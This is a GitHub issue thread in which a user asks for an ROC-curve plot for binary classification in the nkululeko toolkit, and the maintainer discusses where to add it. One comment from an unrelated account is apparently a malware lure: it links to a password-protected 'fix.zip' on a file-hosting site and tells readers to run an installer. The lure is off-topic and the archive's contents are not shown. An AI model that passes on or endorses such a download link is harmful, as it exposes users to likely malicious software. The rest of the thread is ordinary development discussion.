### ISSUE TITLE
Feature request: Plot receiving operator characteristic (ROC) curve for binary classification

### ISSUE THREAD

**Issue by bagustris** [felixbur/nkululeko#154]
In binary classification, e.g, anomaly detection, the most used metric is AUC and pAUC. 
The characteristic of model often can be judged from ROC plot. Since AUC and pAUC are already computed for binary classification, It is very easy and useful to add an ROC curve in several lines.

Scikit-learn reference: https://scikit-learn.org/stable/modules/generated/sklearn.metrics.RocCurveDisplay.html

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by felixbur** [comment]
ok, sounds easy. Do you want to add this or shall i?
I could do it next week at latest.

**Comment by bagustris** [comment]
@felixbur 

I'll do.

**Comment by felixbur** [comment]
i guess it would go best to reporter where, i already added some time ago a default scatter plot for regression problems
